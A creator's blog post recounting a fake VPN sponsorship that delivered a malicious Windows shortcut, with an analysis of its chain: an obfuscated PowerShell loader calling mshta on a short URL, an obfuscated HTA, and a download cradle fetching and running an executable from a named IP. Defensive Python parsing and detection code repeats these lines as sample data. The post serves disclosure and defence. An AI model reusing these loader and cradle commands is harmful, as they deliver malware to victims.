Updated: Feb 15, 2020
This is going to be a long post, so buckle up for an interesting story in which I was targeted by someone and almost got hacked through social engineering.
So, on Feb 9, 2020 I got an email from a company named FruityVPN regarding a sponsorship proposal. They were offering to sponsor my videos on YouTube.
The deal was pretty good, and since I get sponsorship proposals like these very often (mostly from VPN companies), I replied. Also, note that I've had many successful sponsorships from companies like Dashlane, Skillshare, etc. So there's nothing stopping me from negotiating with this company about the type of sponsorship and other details.
They were offering $700 for a 15-20 second feature in a single video. In addition, they were also providing me with an affiliate link through which I could earn a 15% commission. Well, a sponsorship like this is what any YouTuber needs, right?
I was travelling when I got this mail and didn't have my laptop to do proper research on this company; I did visit their website, and it looked legit. So I simply said OK to the deal, considering that I'd had good experiences with sponsorships from VPN companies.
Once I said I was in, I received a reply almost immediately saying that I first need to provide them with the promotional clip before receiving the payment.
I felt a little weird looking at this reply. Usually a company approaching you for a sponsorship would not use a statement like "Before making the payment, you must do this..." I mean, I hadn't asked for the payment yet, had I? It kind of felt like they were trying to lure me.
But anyway, I ignored it and proceeded to say that I need an advance payment of 15% so that I can start working on integrating their ad into my video. This is the general strategy I follow for every sponsorship to stay on the safer side and make sure the sponsors are serious about it. But then I got another weird response.
First off, this is very embarrassing for any creator. An advance payment is a necessity for the mutual benefit of both parties. But anyway, I proceeded by asking them what they meant by the "clip". Then I understood that they first wanted to see a 15-20 second ad clip about their product, which I would later integrate into my video (not the whole video with the ad integrated). Making a 15-20 second video is not a big deal and would hardly take an hour, so the next day I prepared to make the clip and submit it to them.
I was reading the second mail they sent me, and I noticed that they were offering product-related content (usually logos, short clips, product info, features, offers, instructions, etc.) that could be included in the promotional clip.
All brands do provide such brand-related content, so I didn't get suspicious at all.
I clicked on the Google Drive link they sent me and downloaded the file. It was a zip file. I tried unzipping it and got an error.
I replied to them that I was getting an error, but I didn't get a response. In the first mail they sent me, they mentioned contacting them on Twitter for faster replies, so I went to Twitter and messaged them.
The response seemed pretty convincing; maybe they had just mistakenly provided the wrong file?
Anyway, I downloaded the file from the new link they provided and tried unzipping it, but got the same error again. WTF! These guys don't even know how to share a file and they are running a VPN company?
I sent them the screenshot.
I used 7-Zip and still couldn't unzip it.
At this point I was frustrated, and actually looked more closely at the file.
The first thing that surprised me was the file size. It's less than a KB!
Then I looked at the name. It's FruityVPN.txt.lnk.zip
So, after unzipping, it would be FruityVPN.txt.lnk, and this is an LNK file!
An LNK file is nothing but a shortcut file, the kind you create on Windows. It just links to an original file, and when you open the shortcut, it opens the file it is linked to.
My first thought after realizing that it was a shortcut file was: maybe the marketing team is technically illiterate and is trying to share the shortcut file instead of the original file?
So, I messaged them the same.
And now they're concerned about whether I'm doing this on Windows or Mac? WTF?
This is when I got suspicious (a shortcut file only does anything on Windows, so why would it matter to them?).
They further insisted that even though it shows an error while unzipping with 7-Zip, the unzipped file must be saved somewhere on the computer. Yes, it was indeed saved!
But then, the file was not of a recognized type?
I chopped the file name down to FruityVPN.txt.lnk, and now it was recognized as a shortcut!
I obviously didn't want to open it blindly, so I went to the file properties.
For a shortcut file, the target file it is linked to is shown in the "Target" section.
For this shortcut file, the target seemed very weird, or should I say suspicious?
With an LNK analyzer tool, I analyzed it and here is what I found.
Look at the Relative Path: it opens PowerShell and executes the code given in the Arguments section.
$vqc=[string][char[]]@(0x68,0x74,0x74,0x70,0x73) -replace ' ','';$gui=[string][char[]]@(0x6d,0x73,0x68,0x74,0x61) -replace ' ','';sal vn $gui;$vqc+='://bit.do/fsykX';vn $vqc
After analyzing this PowerShell script, I found that it basically downloads a file from https://bit.do/fsykX and runs the downloaded file as soon as it is downloaded. (The two hex character arrays decode to "https" and "mshta", and vn is set as an alias for mshta, so the whole thing boils down to mshta https://bit.do/fsykX.)
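Here is how the same checks can be automated without ever double-clicking the file. This is an added example written for this post, not the author's tool and nothing from the people behind the file: a small Python script that reads the LinkFlags and StringData fields (relative path, arguments) straight out of the .lnk bytes, and then statically resolves the [char[]] / -replace / sal tricks in the argument string. The sample shortcut is constructed inside the script (the relative path to powershell.exe is an assumption; only the argument string is the one quoted above), so it runs offline.

```python
"""Triage a Windows .lnk without opening it (added example, not code from the
post): read LinkFlags and the StringData fields straight from the bytes, then
statically resolve the [char[]] / -replace / sal obfuscation in the arguments."""
import re
import struct

# LinkFlags bits from the MS-SHLLINK specification (only the ones used here)
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]   # in file order
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link; IDList/LinkInfo are skipped."""
    if struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_IDLIST:            # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_FIELDS:               # CountCharacters (2 bytes) + chars
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            size = count * 2 if unicode else count
            fields[name] = data[pos + 2:pos + 2 + size].decode("utf-16-le" if unicode else "cp1252")
            pos += 2 + size
    return fields

def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed fixture: a minimal Unicode shortcut with only RelativePath and Arguments."""
    flags = 0x08 | 0x20 | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # no attrs/times, SW_SHOWNORMAL
    pack = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + pack(relative_path) + pack(arguments)

CHAR_ARRAY = re.compile(r"\[string\]\[char(?:\[\])?\]@\(([^)]*)\)\s*-replace\s*' ',''")

def eval_expr(expr: str, env: dict) -> str:
    """Resolve one value: a hex [char[]] array, a quoted literal, or a $variable."""
    expr = expr.strip()
    m = CHAR_ARRAY.fullmatch(expr)
    if m:                                         # 0x68,0x74,... -> "ht..."
        return "".join(chr(int(x, 16)) for x in m.group(1).split(","))
    if len(expr) >= 2 and expr[0] == expr[-1] and expr[0] in "'\"":
        return expr[1:-1]
    if expr.startswith("$"):
        return env.get(expr[1:], expr)
    return expr

def decode_powershell(cmdline: str) -> list:
    """Walk ';'-separated statements tracking $v=, $v+= and sal/Set-Alias; return
    every command invocation with variables and aliases substituted."""
    env, aliases, commands = {}, {}, []
    for stmt in (s.strip() for s in cmdline.split(";") if s.strip()):
        m = re.fullmatch(r"\$(\w+)\s*(\+?=)\s*(.+)", stmt)
        if m:
            name, op, rhs = m.groups()
            value = eval_expr(rhs, env)
            env[name] = env.get(name, "") + value if op == "+=" else value
            continue
        m = re.fullmatch(r"(?:sal|Set-Alias)\s+(\S+)\s+(\S+)", stmt, re.I)
        if m:
            aliases[m.group(1)] = eval_expr(m.group(2), env)
            continue
        tokens = [eval_expr(t, env) for t in stmt.split()]
        tokens[0] = aliases.get(tokens[0], tokens[0])
        commands.append(" ".join(tokens))
    return commands

LAUNCHERS = ("powershell", "pwsh", "mshta", "wscript", "cscript", "cmd.exe", "rundll32")

def triage_lnk(data: bytes) -> dict:
    """Flag a shortcut whose target is a script host and show what its arguments resolve to."""
    fields = parse_lnk(data)
    target = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    launcher = next((name for name in LAUNCHERS if name in target), None)
    decoded = decode_powershell(fields["arguments"]) if "arguments" in fields else []
    return {"fields": fields, "launcher": launcher, "decoded": decoded,
            "suspicious": launcher is not None}

# Constructed sample: the relative path is assumed; the argument string is the one the post quotes.
SAMPLE_ARGS = ("$vqc=[string][char[]]@(0x68,0x74,0x74,0x70,0x73) -replace ' ','';"
               "$gui=[string][char[]]@(0x6d,0x73,0x68,0x74,0x61) -replace ' ','';"
               "sal vn $gui;$vqc+='://bit.do/fsykX';vn $vqc")
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", SAMPLE_ARGS)
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", "readme.txt")

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        print(label, triage_lnk(blob))
```

The decoder only understands the handful of constructions this sample uses (hex character arrays joined with -replace, string concatenation, sal aliases), which is exactly the point of doing it statically: nothing in the argument string is ever executed, and the resolved command (mshta followed by the short URL) is what you compare against the "marketing material" the sender claimed to be sharing.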
I manually went to this link from my browser, and it downloaded a .hta file.
When downloading in a browser, it shows a warning that the file may harm your computer, but when it is downloaded from PowerShell, no warnings are shown and the file is downloaded without any interruption.
This is an HTML Application (.hta file).
It functions similarly to a .exe file. When you double-click a .hta file, it runs immediately, just like a .exe would.
Instead of double-clicking the file, I opened it with a text editor, and since it's an HTML Application, I was able to read the code.
The code looked like this.
If you want to read the code for yourself, I saved it here.
The HTML Application has VBScript in it.
The code looked very funny and gibberish. There was no way anyone could figure out what it does just by looking at it. The reason is that all the variables are random strings that make no sense, including the function names, and it includes a lot of additional unnecessary code in order to make it less readable.
For example, instead of directly storing the value for a variable as zrcrkxn = 2
they are doing zrcrkxn = 1 * 3 - 1
Obviously, because it's malware. If you were the one who wrote this malware, you wouldn't want someone to read and figure out what your code does, right? You would want to make it as unreadable as possible.
After taking some time, I figured out what the code does.
I reformed the gibberish VBScript into something that makes more sense. I skipped some parts of the code, because I didn't want certain things to be executed (the ones that would do malicious tasks on my computer, which is the whole point of the malware). I just wanted to see what each Function does. You can read the reformed code here.
I executed this on my command prompt with cscript reformedcode.vbs
Another PowerShell script?
The next two lines of the original code (which I skipped in my reformed code) were:
set xgjtof = CreateObject("Wscript.Shell")
khezxtlctf is basically the PowerShell script highlighted with the red box in the above screenshot.
xgjtof.Run(khezxtlctf),0,true will run this text through the Wscript.Shell object created on the line above.
This is going to run the PowerShell script in Windows PowerShell.
Again, looking at this PowerShell script makes me angry, because look at those variable names and those unnecessary operations. The goal is to not be readable, of course. You can read the PowerShell script here.
Once again, I took some time to analyze it and understood what it does.
I took each line of the PowerShell script (separated by semicolons) and executed it in my PowerShell window, carefully skipping the risky lines.
Here are the important variables and their corresponding values I found:
$jfwlpghdovb = "iyf" (these are 3 randomly generated lowercase letters; it can be any other combination of 3 letters)
$hdxnlosbpmk = ".exe" (this is a constant)
$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk (which makes "iyf.exe")
$kjavpydntew = "Net.WebClient" (a pre-defined .NET class available from PowerShell)
$bykmo = "C:\Users\Public\iyf.exe" (the path where the file is created)
$zvngemsbua = "http://220.127.116.11/brft/crypted.exe" (this is the most interesting one: the address from which the actual malware is downloaded)
Finally, it downloads the file from $zvngemsbua and writes it to $bykmo.
Since it's PowerShell, no interruptions were encountered even though the file being downloaded is malware. The file downloads successfully to the defined destination.
And then it starts the process at $bykmo, which means it runs iyf.exe (the actual malware, in .exe format).
Oh boy! So this is what's happening. They want to hack my computer and probably steal my YouTube channel (with 400k subs). I'm pretty sure the malware in iyf.exe will give them a shell on my computer, or it may even be ransomware. Not sure, as I haven't reverse-engineered the .exe malware yet. But it was obviously malware.
Meanwhile, the Twitter conversation went on. Even after knowing that they were trying to hack me, I acted like I didn't know what was going on.
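The chain above (shortcut -> PowerShell -> mshta -> a second PowerShell that downloads to C:\Users\Public and starts iyf.exe) is also what a defender would want to catch in process-creation telemetry. Below is an added example, not code from the post, of that detection logic in Python, run over constructed JSON-lines events modelled on Sysmon process-creation fields (ParentImage, Image, CommandLine). The obfuscated argument string, the URL and the C:\Users\Public\iyf.exe path are the ones the post reports; the third command line is reconstructed from the post's description of the variables, not quoted from the sample, and the two last events are benign controls.

```python
"""Detection rules for the LNK -> PowerShell -> mshta -> download-cradle chain
described in the post (added example, not code from the post). Events are a
constructed JSON-lines sample modelled on Sysmon process-creation fields."""
import json
import re

# Constructed sample: the first two command lines and the IP/paths are the ones the post
# reports; the third command line is reconstructed from the post's description of the
# variables; the last two events are benign controls.
SAMPLE_EVENTS = r"""
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe $vqc=[string][char[]]@(0x68,0x74,0x74,0x70,0x73) -replace ' ','';$gui=[string][char[]]@(0x6d,0x73,0x68,0x74,0x61) -replace ' ','';sal vn $gui;$vqc+='://bit.do/fsykX';vn $vqc"}
{"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://bit.do/fsykX"}
{"ParentImage": "C:\\Windows\\System32\\mshta.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell $kjavpydntew='Net.WebClient';$bykmo='C:\\Users\\Public\\iyf.exe';$zvngemsbua='http://220.127.116.11/brft/crypted.exe';(New-Object $kjavpydntew).DownloadFile($zvngemsbua,$bykmo);Start-Process $bykmo"}
{"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Image": "C:\\Users\\Public\\iyf.exe", "CommandLine": "C:\\Users\\Public\\iyf.exe"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe readme.txt"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe Get-Process | Sort-Object CPU"}
"""

URL = re.compile(r"https?://\S+", re.I)
# [char]@( / [char[]]@( hex arrays, the space-stripping -replace, and sal/Set-Alias
OBFUSCATION = re.compile(r"\[char\[?\]?\]@\(|-replace\s*' ',''|\bsal\b|set-alias", re.I)
CRADLE = re.compile(r"net\.webclient.*download(file|string)", re.I)
PUBLIC_EXE = re.compile(r"\\users\\public\\[^\s'\"]+\.exe", re.I)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

def image_name(path: str) -> str:
    """Basename of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: dict) -> list:
    """Return the names of every rule the event matches (empty for benign events)."""
    image, parent, cmd = image_name(ev["Image"]), image_name(ev["ParentImage"]), ev["CommandLine"]
    hits = []
    if image == "powershell.exe" and parent == "explorer.exe" and OBFUSCATION.search(cmd):
        hits.append("obfuscated_powershell_from_shortcut")   # .lnk double-clicked in Explorer
    if image == "mshta.exe" and URL.search(cmd):
        hits.append("mshta_remote_content")                   # mshta pulling an .hta over HTTP(S)
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawned_powershell")         # the HTA's VBScript -> Wscript.Shell Run
    if CRADLE.search(cmd) and URL.search(cmd):
        hits.append("download_cradle")                        # Net.WebClient fetching a file to disk
    if PUBLIC_EXE.search(ev["Image"]) or PUBLIC_EXE.search(cmd):
        hits.append("executable_in_users_public")             # C:\Users\Public\<3 letters>.exe
    return hits

def detect(jsonl: str) -> list:
    """Run every rule over each non-empty JSON line; return (event index, rule name) pairs."""
    alerts = []
    for idx, line in enumerate(l for l in jsonl.splitlines() if l.strip()):
        for rule in classify(json.loads(line)):
            alerts.append((idx, rule))
    return alerts

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule on its own is noisy (admins do spawn PowerShell from Explorer, and mshta has legitimate uses), so the value is in the chain: one host raising obfuscated_powershell_from_shortcut, mshta_remote_content, script_host_spawned_powershell and download_cradle within a few seconds of a .lnk being opened is exactly the sequence the post walks through, and the executable_in_users_public hit on the final process is where a block-on-execute control would have stopped it.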
I finally revealed that I knew what they were trying to do.
And this is the response I got after exposing them.
LOL, what an immature childish response!
PS: Keeping everything else aside, I really think this was a pretty well-executed social engineering attack. If this had been done to some other, non-technical creator, they would probably have fallen for it. Initially, I fell for it too, but thank god I realized before things got out of control.